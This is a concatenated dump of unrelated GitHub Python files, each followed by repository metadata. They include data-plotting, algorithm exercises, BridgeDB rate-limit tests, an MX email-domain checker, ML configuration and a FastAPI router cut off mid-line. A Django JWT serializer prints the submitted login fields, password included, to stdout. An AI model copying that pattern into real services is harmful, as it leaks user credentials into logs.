\"__main__\":\n\n layer = \"6\"\n\n cases = [\"or_scheme_test_CABLE-2.2.3_pore_scale_model_dq_dq2_rsv_rBL\"]\n #[\"met_only_or_test_CABLE-2.2.3_pore_scale_model_l_new_roughness_soil-off\"]\n # [\"default-met_only\"]\n cable_version = \"pore_scale_model\"\n # \"Mark_latest\",\"pore_scale_model\"\n\n rings = [\"amb\"] #[\"R1\",\"R2\",\"R3\",\"R4\",\"R5\",\"R6\",\"amb\",\"ele\"]\n for case_name in cases:\n for ring in rings:\n fobs = \"/srv/ccrc/data25/z5218916/cable/EucFACE/Eucface_data/swc_average_above_the_depth/swc_tdr.csv\"\n fcable =\"/srv/ccrc/data25/z5218916/cable/EucFACE/EucFACE_run/outputs/%s/EucFACE_%s_out.nc\" % (case_name, ring)\n main(fobs, fcable, case_name, ring, layer, cable_version)\n","repo_name":"bibivking/EucFACE_run","sub_path":"plots/plot_eucface_swc_cable_vs_obs_tdr_CABLE-2.2.3_pore_scale_model.py","file_name":"plot_eucface_swc_cable_vs_obs_tdr_CABLE-2.2.3_pore_scale_model.py","file_ext":"py","file_size_in_byte":7574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72855997608","text":"class Node:\n def __init__(self,value) -> None:\n self.value=value\n self.next=None\nclass SLL:\n def __init__(self) -> None:\n self.head=None\n self.tail=None\n def __iter__(self)-> None:\n node=self.head\n while node:\n yield node\n node=node.next\n def insertion(self,value,key):\n node=Node(value)\n if self.head==None:\n self.head=node\n self.tail=node\n else:\n if value>=key:\n self.tail.next=node\n self.tail=node\n else:\n node.next=self.head\n self.head=node\nsinglelinkedlist=SLL()\nprint(\"Enter the elements of the linked list\")\nlistele=list(map(int,input().split()))\nkey=int(input(\"Enter the value about which u want to partition the linked list:\"))\nfor ele in listele:\n singlelinkedlist.insertion(ele,key)\nprint([node.value for node in singlelinkedlist])","repo_name":"bharath-reddy07/Data-Structures","sub_path":"Linked_List/Partition_lined_list.py","file_name":"Partition_lined_list.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10083119375","text":"def charToValue(char):\n ascii = ord(char)\n if ascii < 97:\n return ascii - 38\n else:\n return ascii - 96\n\n\nf = open(\"input.txt\", \"r\")\nlines = f.readlines()\n\nvalue = 0\ni = 0\nelves = [\"\"] * 3\n\nfor line in lines:\n elves[i % 3] = line.rstrip('\\n')\n i += 1\n if i % 3 == 0:\n s = str(set(elves[0]) & set(elves[1]) & set(elves[2]))\n value += charToValue(s[2])\nprint(value)\n","repo_name":"3rik1sbit/aoc2022","sub_path":"day3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16861911240","text":"# program to count the freq of characters in a string\r\ncontent= input(\"enter string : \")\r\ncontent= content.lower()\r\nfor i in range(97,123):\r\n count = 0\r\n j= chr(i)\r\n for l in content:\r\n if j==l :\r\n count = count +1\r\n if count>0:\r\n print(j ,\":\", count)\r\n \r\n\r\n","repo_name":"giridharan1129/python-practice-solutions","sub_path":"string1.py","file_name":"string1.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10060811140","text":"# Uses python3\nimport sys\nimport random\n\n\ndef test():\n a = [6, 4, 1, 7, 2, 10]\n expected = sorted(a)\n randomized_quick_sort(a, 0, len(a) - 1)\n print(f'exp: {expected}\\nres: {a}\\n')\n assert a == expected\n\n print('OK')\n\n\ndef partition3_tmp(a, l, r):\n print(f'before: {a} ({l}...{r})')\n x = a[l]\n # j: last 'less than' element\n j = l\n # e: last 'equal' element\n e = l\n # i: last 'greater than' element\n for i in range(l + 1, r + 1):\n if a[i] < x:\n j += 1\n a[i], a[j] = a[j], a[i]\n elif a[i] == x:\n j += 1\n a[i], a[j] = a[j], a[i]\n e += 1\n a[j], a[e] = a[e], a[j]\n\n # a[l], a[j] = a[j], a[l]\n print(f'after: {a} (e: {e} j: {j}) x: {x}')\n return e, j\n\n\ndef partition2(a, l, r):\n x = a[l]\n j = l\n for i in range(l + 1, r + 1):\n if a[i] <= x:\n j += 1\n a[i], a[j] = a[j], a[i]\n a[l], a[j] = a[j], a[l]\n return j\n\n\ndef partition3(a, l, r):\n pivot = a[l]\n # 1st 'equal' element; lt_end+1 is the last elem of 'less than' interval\n lt_end = l\n # last 'equal' element; gt_begin+1 is the first elem of 'greater than' interval\n gt_begin = r\n\n i = l\n while i <= gt_begin:\n if a[i] < pivot:\n a[lt_end], a[i] = a[i], a[lt_end]\n i += 1\n lt_end += 1\n elif a[i] > pivot:\n a[i], a[gt_begin] = a[gt_begin], a[i]\n gt_begin -= 1\n elif a[i] == pivot:\n i += 1\n\n return lt_end, gt_begin\n\n\ndef randomized_quick_sort(a, l, r):\n if l >= r:\n return\n k = random.randint(l, r)\n a[l], a[k] = a[k], a[l]\n lt_end, gt_begin = partition3(a, l, r)\n randomized_quick_sort(a, l, lt_end - 1)\n randomized_quick_sort(a, gt_begin + 1, r)\n\n\ndef main():\n input = sys.stdin.read()\n n, *a = list(map(int, input.split()))\n randomized_quick_sort(a, 0, n - 1)\n for x in a:\n print(x, end=' ')\n\n\nif __name__ == '__main__':\n # test()\n main()","repo_name":"chlos/UCSD-Data-Structures-and-Algorithms","sub_path":"course_01_algorithmic_toolbox/w04/3_improving_quicksort/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27184791577","text":"from __future__ import print_function\n\nimport logging\nimport tempfile\nimport os\n\nfrom twisted.internet.task import Clock\nfrom twisted.trial import unittest\n\nimport bridgedb.Storage\n\nfrom bridgedb.bridges import Bridge\nfrom bridgedb.distributors.email.distributor import EmailDistributor\nfrom bridgedb.distributors.email.distributor import IgnoreEmail\nfrom bridgedb.distributors.email.distributor import TooSoonEmail\nfrom bridgedb.distributors.email.request import EmailBridgeRequest\nfrom bridgedb.parse.addr import BadEmail\nfrom bridgedb.parse.addr import UnsupportedDomain\nfrom bridgedb.parse.addr import normalizeEmail\n\nfrom bridgedb.test.util import generateFakeBridges\n\nlogging.disable(50)\n\n\nBRIDGES = generateFakeBridges()\n\n\nclass EmailDistributorTests(unittest.TestCase):\n \"\"\"Tests for :class:`bridgedb.distributors.email.distributor.EmailDistributor`.\"\"\"\n\n # Fail any tests which take longer than 15 seconds.\n timeout = 15\n\n def setUp(self):\n self.fd, self.fname = tempfile.mkstemp(suffix=\".sqlite\", dir=os.getcwd())\n bridgedb.Storage.initializeDBLock()\n self.db = bridgedb.Storage.openDatabase(self.fname)\n bridgedb.Storage.setDBFilename(self.fname)\n\n self.bridges = BRIDGES\n self.key = 'aQpeOFIj8q20s98awfoiq23rpOIjFaqpEWFoij1X'\n self.domainmap = {\n 'example.com': 'example.com',\n 'dkim.example.com': 'dkim.example.com',\n }\n self.domainrules = {\n 'example.com': ['ignore_dots'],\n 'dkim.example.com': ['dkim', 'ignore_dots']\n }\n\n def tearDown(self):\n self.db.close()\n os.close(self.fd)\n os.unlink(self.fname)\n\n def makeClientRequest(self, clientEmailAddress):\n bridgeRequest = EmailBridgeRequest()\n bridgeRequest.client = clientEmailAddress\n bridgeRequest.isValid(True)\n bridgeRequest.generateFilters()\n return bridgeRequest\n\n def test_EmailDistributor_getBridges_default_client(self):\n \"\"\"If EmailBridgeRequest.client was not set, then getBridges() should\n raise a bridgedb.parse.addr.BadEmail exception.\n \"\"\"\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules)\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n # The \"default\" client is literally the string \"default\", see\n # bridgedb.bridgerequest.BridgeRequestBase.\n bridgeRequest = self.makeClientRequest('default')\n\n self.assertRaises(BadEmail, dist.getBridges, bridgeRequest, 1)\n\n def test_EmailDistributor_getBridges_with_whitelist(self):\n \"\"\"If an email address is in the whitelist, it should get a response\n every time it asks (i.e. no rate-limiting).\n \"\"\"\n # The whitelist should be in the form {EMAIL: GPG_FINGERPRINT}\n whitelist = {'white@list.ed': '0123456789ABCDEF0123456789ABCDEF01234567'}\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules,\n whitelist=whitelist)\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n # A request from a whitelisted address should always get a response.\n bridgeRequest = self.makeClientRequest('white@list.ed')\n for i in range(5):\n bridges = dist.getBridges(bridgeRequest, 1)\n self.assertEqual(len(bridges), 3)\n\n def test_EmailDistributor_getBridges_rate_limit_multiple_clients(self):\n \"\"\"Each client should be rate-limited separately.\"\"\"\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules)\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n bridgeRequest1 = self.makeClientRequest('abc@example.com')\n bridgeRequest2 = self.makeClientRequest('def@example.com')\n bridgeRequest3 = self.makeClientRequest('ghi@example.com')\n\n # The first request from 'abc' should get a response with bridges.\n self.assertEqual(len(dist.getBridges(bridgeRequest1, 1)), 3)\n # The second from 'abc' gets a warning.\n self.assertRaises(TooSoonEmail, dist.getBridges, bridgeRequest1, 1)\n # The first request from 'def' should get a response with bridges.\n self.assertEqual(len(dist.getBridges(bridgeRequest2, 1)), 3)\n # The third from 'abc' is ignored.\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest1, 1)\n # The second from 'def' gets a warning.\n self.assertRaises(TooSoonEmail, dist.getBridges, bridgeRequest2, 1)\n # The third from 'def' is ignored.\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest2, 1)\n # The fourth from 'abc' is ignored.\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest1, 1)\n # The first request from 'ghi' should get a response with bridges.\n self.assertEqual(len(dist.getBridges(bridgeRequest3, 1)), 3)\n # The second from 'ghi' gets a warning.\n self.assertRaises(TooSoonEmail, dist.getBridges, bridgeRequest3, 1)\n # The third from 'ghi' is ignored.\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest3, 1)\n # The fourth from 'ghi' is ignored.\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest3, 1)\n\n def test_EmailDistributor_getBridges_rate_limit(self):\n \"\"\"A client's first email should return bridges. The second should\n return a warning, and the third should receive no response.\n \"\"\"\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules)\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n bridgeRequest = self.makeClientRequest('abc@example.com')\n\n # The first request should get a response with bridges.\n bridges = dist.getBridges(bridgeRequest, 1)\n self.assertGreater(len(bridges), 0)\n [self.assertIsInstance(b, Bridge) for b in bridges]\n self.assertEqual(len(bridges), 3)\n\n # The second gets a warning, and the third is ignored.\n self.assertRaises(TooSoonEmail, dist.getBridges, bridgeRequest, 1)\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest, 1)\n\n def test_EmailDistributor_getBridges_rate_limit_expiry(self):\n \"\"\"A client's first email should return bridges. The second should\n return a warning, and the third should receive no response. After the\n EmailDistributor.emailRateMax is up, the client should be able to\n receive a response again.\n \"\"\"\n clock = Clock()\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules)\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n bridgeRequest = self.makeClientRequest('abc@example.com')\n\n # The first request should get a response with bridges.\n self.assertEqual(len(dist.getBridges(bridgeRequest, 1, clock)), 3)\n # The second gets a warning, and the rest are ignored.\n self.assertRaises(TooSoonEmail, dist.getBridges, bridgeRequest, 1, clock)\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest, 1, clock)\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest, 1, clock)\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest, 1, clock)\n\n clock.advance(2 * dist.emailRateMax)\n\n # The client should again a response with bridges.\n self.assertEqual(len(dist.getBridges(bridgeRequest, 1)), 3, clock)\n\n def test_EmailDistributor_cleanDatabase(self):\n \"\"\"Calling cleanDatabase() should cleanup email times in database, but\n not allow clients who have been recently warned and/or ignored to\n receive a response again until the remainder of their MAX_EMAIL_RATE\n time is up.\n \"\"\"\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules)\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n bridgeRequest = self.makeClientRequest('abc@example.com')\n\n # The first request should get a response with bridges.\n self.assertEqual(len(dist.getBridges(bridgeRequest, 1)), 3)\n # The second gets a warning, and the third is ignored.\n self.assertRaises(TooSoonEmail, dist.getBridges, bridgeRequest, 1)\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest, 1)\n\n dist.cleanDatabase()\n\n # Cleaning the warning email times in the database shouldn't cause\n # 'abc@example.com' to be able to email again, because only the times\n # which aren't older than EMAIL_MAX_RATE should be cleared.\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest, 1)\n\n def test_EmailDistributor_prepopulateRings(self):\n \"\"\"Calling prepopulateRings() should add two rings to the\n EmailDistributor.hashring.\n \"\"\"\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules)\n\n # There shouldn't be any subrings yet.\n self.assertEqual(len(dist.hashring.filterRings), 0)\n\n dist.prepopulateRings()\n\n # There should now be two subrings, but the subrings should be empty.\n self.assertEqual(len(dist.hashring.filterRings), 2)\n for (filtre, subring) in dist.hashring.filterRings.values():\n self.assertEqual(len(subring), 0)\n\n # The subrings in this Distributor have gross names, because the\n # filter functions (including their addresses in memory!) are used as\n # the subring names. In this case, we should have something like:\n #\n # frozenset([])\n #\n # and\n #\n # frozenset([])\n #\n # So we have to join the strings together and check the whole thing,\n # since we have no other way to use these stupid subring names to\n # index into the dictionary they are stored in, because the memory\n # addresses are unknowable until runtime.\n\n # There should be an IPv4 subring and an IPv6 ring:\n ringnames = dist.hashring.filterRings.keys()\n self.failUnlessIn(\"IPv4\", \"\".join([str(ringname) for ringname in ringnames]))\n self.failUnlessIn(\"IPv6\", \"\".join([str(ringname) for ringname in ringnames]))\n\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n # There should still be two subrings.\n self.assertEqual(len(dist.hashring.filterRings), 2)\n for (filtre, subring) in dist.hashring.filterRings.values():\n self.assertGreater(len(subring), 0)\n\n # Ugh, the hashring code is so gross looking.\n subrings = dist.hashring.filterRings\n subring1 = subrings.values()[0][1]\n subring2 = subrings.values()[1][1]\n # Each subring should have roughly the same number of bridges.\n # (Having ±10 bridges in either ring, out of 500 bridges total, should\n # be so bad.)\n self.assertApproximates(len(subring1), len(subring2), 10)\n\n def test_EmailDistributor_unsupported_domain(self):\n \"\"\"An unsupported domain should raise an UnsupportedDomain exception.\"\"\"\n self.assertRaises(UnsupportedDomain, normalizeEmail,\n 'bad@email.com', self.domainmap, self.domainrules)\n","repo_name":"isislovecruft/bridgedb","sub_path":"bridgedb/test/test_email_distributor.py","file_name":"test_email_distributor.py","file_ext":"py","file_size_in_byte":11229,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39166315197","text":"import ConfigSpace\n\n\ndef get_hyperparameter_search_space_small(seed):\n \"\"\"\n Small version of svm config space, featuring important hyperparameters\n based on https://arxiv.org/abs/1710.04725\n\n Parameters\n ----------\n seed: int\n Random seed that will be used to sample random configurations\n\n Returns\n -------\n cs: ConfigSpace.ConfigurationSpace\n The configuration space object\n \"\"\"\n cs = ConfigSpace.ConfigurationSpace('sklearn.svm.SVC', seed)\n\n C = ConfigSpace.UniformFloatHyperparameter(\n name='svc__C', lower=0.03125, upper=32768, log=True, default_value=1.0)\n kernel = ConfigSpace.CategoricalHyperparameter(\n name='svc__kernel', choices=['rbf', 'poly', 'sigmoid'], default_value='rbf')\n degree = ConfigSpace.UniformIntegerHyperparameter(\n name='svc__degree', lower=1, upper=5, default_value=3)\n gamma = ConfigSpace.UniformFloatHyperparameter(\n name='svc__gamma', lower=3.0517578125e-05, upper=8, log=True, default_value=0.1)\n coef0 = ConfigSpace.UniformFloatHyperparameter(\n name='svc__coef0', lower=-1, upper=1, default_value=0)\n\n cs.add_hyperparameters([\n C,\n kernel,\n degree,\n gamma,\n coef0\n ])\n\n degree_depends_on_poly = ConfigSpace.EqualsCondition(degree, kernel, 'poly')\n coef0_condition = ConfigSpace.InCondition(coef0, kernel, ['poly', 'sigmoid'])\n cs.add_condition(degree_depends_on_poly)\n cs.add_condition(coef0_condition)\n\n return cs\n\n\ndef get_hyperparameter_search_space_micro(seed):\n \"\"\"\n Small version of svm config space, featuring important hyperparameters\n as used by:\n http://metalearning.ml/2018/papers/metalearn2018_paper70.pdf\n\n Parameters\n ----------\n seed: int\n Random seed that will be used to sample random configurations\n\n Returns\n -------\n cs: ConfigSpace.ConfigurationSpace\n The configuration space object\n \"\"\"\n cs = ConfigSpace.ConfigurationSpace('sklearn.svm.SVC', seed)\n\n kernel = ConfigSpace.Constant(name='svc__kernel', value='rbf')\n C = ConfigSpace.UniformFloatHyperparameter(name='svc__C', lower=0.03125, upper=32768, log=True, default_value=1.0)\n gamma = ConfigSpace.UniformFloatHyperparameter(\n name='svc__gamma', lower=3.0517578125e-05, upper=8, log=True, default_value=0.1)\n\n cs.add_hyperparameters([\n kernel,\n C,\n gamma\n ])\n\n return cs\n","repo_name":"janvanrijn/openml-defaults","sub_path":"openmldefaults/config_spaces/svc.py","file_name":"svc.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15210576798","text":"import pandas as pd\npd.options.mode.chained_assignment = None # default='warn'\nimport numpy as np\nimport dns.resolver\nimport time\nimport os\n\n\n\n\n\n#current_directory = os.getcwd()\n\n\ndf_domains_list=[]\nbig_df_domains = []\nk=1\n\n\ndef mx_validate(df,email_col_name,csvfile, current_directory):\n global df_domains_list\n global big_df_domains\n global k\n\n final_directory = os.path.join(current_directory, r'mx valid emails')\n if not os.path.exists(final_directory):\n os.makedirs(final_directory)\n\n\n df[['mail', 'domain']] = df[email_col_name].str.split('@', 1, expand=True)\n df = df[~df['domain'].isnull()]\n domains = list(df.domain.unique())\n\n if 'checked_domains.csv' in os.listdir(current_directory):\n big_df_domains = pd.read_csv(current_directory + '/' + 'checked_domains.csv')\n if k ==1:\n df_domains_list.append(big_df_domains)\n checked_domains_list = list(big_df_domains['domain'].unique())\n if 'type' in big_df_domains.columns:\n if 'invalid' in big_df_domains['type'].unique():\n invaid_domains = list(big_df_domains[big_df_domains['type'] == 'invalid']['domain'].unique())\n df = df[~df['domain'].isin(invaid_domains)]\n\n else:\n if len(df_domains_list) >0:\n checked_domains_list = list(big_df_domains['domain'].unique())\n if 'invalid' in big_df_domains['type'].unique():\n invaid_domains = list(big_df_domains[big_df_domains['type'] == 'invalid']['domain'].unique())\n df = df[~df['domain'].isin(invaid_domains)]\n else:\n checked_domains_list = []\n\n\n domains_dict = {}\n invalid_domains_list = []\n\n i = 0\n for domain in domains:\n i = i + 1\n if domain not in checked_domains_list:\n try:\n mxRecords = dns.resolver.resolve(domain, 'MX')\n exchanges = [exchange.to_text().split()[1] for exchange in mxRecords]\n domains_dict[domain] = ['valid', exchanges]\n print(str(len(os.listdir(current_directory)) - k) + ' files remaining')\n s = str(len(os.listdir(current_directory)) - k) + ' files remaining'\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n print(domain + ' domain exist')\n s = domain + ' domain exist'\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n \n\n except:\n print(str(len(os.listdir(current_directory)) - k) + ' files remaining')\n s = str(len(os.listdir(current_directory)) - k) + ' files remaining'\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n print(domain + ' domain does not exist')\n s = domain + ' domain does not exist'\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n domains_dict[domain] = ['invalid',np.nan]\n invalid_domains_list.append(domain)\n\n time.sleep(0.2)\n per = i * 100 / len(domains)\n print(str(int(per)) + '%')\n yield str(int(per)) + '%'\n #plainTextEdit_Page6.appendPlainText(str(int(per)) + '%')\n #QApplication.processEvents()\n\n print('===================================================================================')\n yield '==================================================================================='\n #plainTextEdit_Page6.appendPlainText('===================================================================================')\n #QApplication.processEvents()\n\n else:\n print(str(len(os.listdir(current_directory)) - k) + ' files remaining')\n s = str(len(os.listdir(current_directory)) - k) + ' files remaining'\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n print(domain + ' domain had been checked before')\n s = domain + ' domain had been checked before'\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n per = i * 100 / len(domains)\n print(str(int(per)) + '%')\n yield str(int(per)) + '%'\n #plainTextEdit_Page6.appendPlainText(str(int(per)) + '%')\n #QApplication.processEvents()\n\n print('===================================================================================')\n yield '==================================================================================='\n #plainTextEdit_Page6.appendPlainText('===================================================================================')\n #QApplication.processEvents()\n\n df = df[~df['domain'].isin(invalid_domains_list)]\n df = df.drop(columns=['mail', 'domain'])\n\n df.to_csv(final_directory + '/' + csvfile, encoding=\"ISO-8859-1\", index=None, header=True)\n\n df_domains = pd.DataFrame.from_dict(domains_dict, orient='index').reset_index().rename(columns={'index': 'domain', 0: 'type', 1: 'mx records'})\n\n df_domains_list.append(df_domains)\n big_df_domains = pd.concat(df_domains_list)\n big_df_domains.to_csv(current_directory + '/' +'checked_domains.csv', index=None, header=True)\n\n\n #save valid and invalid domains in separate files\n big_df_domains_valid = big_df_domains.copy()\n big_df_domains_invalid = big_df_domains.copy()\n \n big_df_domains_valid = big_df_domains_valid.drop('mx records', axis=1)\n big_df_domains_invalid = big_df_domains_invalid.drop('mx records', axis=1)\n\n\n big_df_domains_valid = big_df_domains_valid[big_df_domains_valid['type'].isin(['valid'])]\n big_df_domains_invalid = big_df_domains_invalid[big_df_domains_invalid['type'].isin(['invalid'])]\n\n\n big_df_domains_valid.to_csv(current_directory + '/' +'checked_domains_valid.csv', index=None, header=True)\n big_df_domains_invalid.to_csv(current_directory + '/' +'checked_domains_invalid.csv', index=None, header=True)\n\n \n k = k + 1\n\n\n\n\n\ndef DirctoryPathToValidation(current_directory):\n j=1\n \n for csvfile in os.listdir(current_directory):\n if csvfile.endswith(\".csv\") and not csvfile == 'checked_domains.csv':\n start_time = time.time()\n print('loading ' + csvfile + ' file: ' + str(j))\n s = 'loading ' + csvfile + ' file: ' + str(j)\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n try:\n df = pd.read_csv(current_directory + '/' + csvfile, encoding=\"ISO-8859-1\", error_bad_lines=False,dtype=str)\n except:\n print('problem reading ' + csvfile)\n s = 'problem reading ' + csvfile\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n if 'EMAIL' in df.columns:\n email_col_name = 'EMAIL'\n df = df[df['EMAIL'].notna()].reset_index(drop=True)\n df = df[~df['EMAIL'].isnull()]\n print('MX filtering....')\n val = mx_validate(df,email_col_name,csvfile,current_directory)\n for value in val:\n yield value\n elif 'Email' in df.columns:\n email_col_name = 'Email'\n df = df[df['Email'].notna()].reset_index(drop=True)\n df = df[~df['Email'].isnull()]\n print('MX filtering....')\n val = mx_validate(df,email_col_name,csvfile,current_directory)\n for value in val:\n yield value\n\n j = j + 1\n\n #print(\"--- %s minuts ---\" % ((time.time() - start_time)))\n #s = \"--- %s minuts ---\" % ((time.time() - start_time))\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()","repo_name":"eslamdyab21/Apara-Data-GUI","sub_path":"scripts/MX_Domain_Validator.py","file_name":"MX_Domain_Validator.py","file_ext":"py","file_size_in_byte":8166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5982604359","text":"from model.data_utils import CoNLLDataset\nfrom model.ner_model import NERModel\nfrom model.config import Config\n\n\ndef main():\n # create instance of config\n config = Config()\n\n # build model\n model = NERModel(config)\n model.build()\n # model.restore_session(\"results/crf/model.weights/\") # optional, restore weights\n # model.reinitialize_weights(\"proj\")\n\n # create datasets\n dev = CoNLLDataset(config.filename_dev, config.processing_word,\n config.processing_tag, config.max_iter)\n train = CoNLLDataset(config.filename_train, config.processing_word,\n config.processing_tag, config.max_iter)\n\n # train model\n model.train(train, dev)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"guillaumegenthial/sequence_tagging","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":1935,"dataset":"github-code","pt":"53"} +{"seq_id":"7529486235","text":"from rest_framework_simplejwt.serializers import TokenObtainPairSerializer\n\n\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\n\n def validate(self, attrs):\n print(attrs)\n data = super().validate(attrs)\n refresh = self.get_token(self.user)\n data['refresh'] = str(refresh)\n data['token'] = str(refresh.access_token)\n data['id'] = self.user.id\n data['username'] = self.user.username\n return {\"data\": data}\n\n","repo_name":"xupengxunil/ops-api","sub_path":"apps/simplejwt/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40823495074","text":"from sklearn.cluster import KMeans\nfrom sklearn.datasets import make_blobs\nimport matplotlib.pyplot as plt\n\nfrom sklearn_evaluation import plot\n\nX, y = make_blobs(\n n_samples=500,\n n_features=2,\n centers=4,\n cluster_std=1,\n center_box=(-10.0, 10.0),\n shuffle=True,\n random_state=1,\n)\n\nkmeans = KMeans(random_state=1, n_init=5)\nplot.silhouette_analysis(X, kmeans, range_n_clusters=[3])\nplt.show()\n","repo_name":"edublancas/sklearn-evaluation","sub_path":"examples/silhouette_plot_basic.py","file_name":"silhouette_plot_basic.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"20522081262","text":"\"\"\"\nAdd contact trackers to Solution Information for all nonlinear contacts\n=======================================================================\n\"\"\"\n\nmodel = ExtAPI.DataModel.Project.Model\nanalysis = model.Analyses[0]\nsol_info = analysis.Solution.SolutionInformation\n\n# Get all nonliner connections and contacts\nconns = model.Connections\ncontacts = conns.GetChildren(DataModelObjectCategory.ContactRegion, True)\nlinear_contacts = [ContactType.Bonded, ContactType.NoSeparation]\ncontacts = [c for c in contacts if c.ContactType not in linear_contacts]\nsupp_conts = [c for c in contacts if c.Suppressed]\n\n# Create contact trackers\ntrackers = {}\nwith Transaction(True): # Suppress GUI update until complete to speed the process\n for c in contacts:\n trackers[c] = []\n \n # Create Number Contacting tracker\n _ = sol_info.AddNumberContacting()\n _.ContactRegion = c\n trackers[c].append(_)\n \n # Create Contact Pressure tracker\n _ = sol_info.AddContactPressure()\n _.ContactRegion = c\n trackers[c].append(_)\n \n # Create Penetration tracker\n _ = sol_info.AddPenetration()\n _.ContactRegion = c\n trackers[c].append(_)\n \n # Create Max Normal Stiffness tracker\n _ = sol_info.AddContactMaximumNormalStiffness()\n _.ContactRegion = c\n trackers[c].append(_)\n \n # Create Stabilization Energy tracker\n _ = sol_info.AddStabilizationEnergy()\n _.ContactRegion = c\n trackers[c].append(_)\n \n # Create Force Convergence tracker\n _ = sol_info.AddContactPairForceConvergenceNorm()\n _.ContactRegion = c\n trackers[c].append(_)\n \n # Create Gap tracker\n _ = sol_info.AddGap()\n _.ContactRegion = c\n trackers[c].append(_)\n \n# Rename the trackers by definition\nfor c, tr in trackers.items():\n for t in tr:\n t.RenameBasedOnDefinition()\n\n# Place the trackers into grouping folders for each contact\ngroups =[]\nfor i, c in enumerate(trackers.keys()):\n groups.append(Tree.Group(trackers[c]))\n groups[i].Name = \"Contact - \" + c.Name\n\n# Place the tracker folders into one common folder\ngrps = Tree.Group(groups)\ngrps.Name = \"Contact Trackers\"\n\nTree.Activate([analysis.Solution])","repo_name":"lytemar/Ansys-Mechanical-Scripts","sub_path":"add_contact_trackers_for_all_nonlinear_contacts.py","file_name":"add_contact_trackers_for_all_nonlinear_contacts.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"27969096094","text":"from fastapi import Depends, APIRouter, Response\nfrom fastapi.security import HTTPBearer\nfrom app.http.services.queue import QueueStatisticsService, PeriodsLoadQueue, PeriodsActiveQueue\nfrom dependency_injector.wiring import Provide, inject\nfrom app.kernel.container import Container\nfrom app.http.services.helpers import default_error\nfrom pydantic import ValidationError\n\nroute = APIRouter(\n prefix=\"/queue/statistics\",\n tags=['queues_statistics'],\n responses={404: {\"description\": \"Not found\"}} \n)\n\nsecurity = HTTPBearer()\n\n\n@route.get(\"/loading/{uuid}\")\n@inject\ndef loading_the_queue(\n uuid: str, \n period: PeriodsLoadQueue,\n response: Response,\n stat_service: QueueStatisticsService = Depends(Provide[Container.queue_statistics_service]),\n HTTPBearerSecurity: HTTPBearer = Depends(security)\n):\n try:\n result = stat_service.queue_load(uuid, type_period=period)\n except Exception as e:\n err = default_error(e)\n response.status_code = err[0]\n result = err[1]\n return result\n\n@route.get(\"/active_queues\")\n@inject\ndef operation_of_active_queues(\n period: PeriodsActiveQueue,\n response: Response,\n stat_service: QueueStatisticsService = Depends(Provide[Container.queue_statistics_service]),\n HTTPBearerSecurity: HTTPBearer = Depends(security)\n):\n try:\n result = stat_service.active_queues(period)\n except Exception as e:\n err = 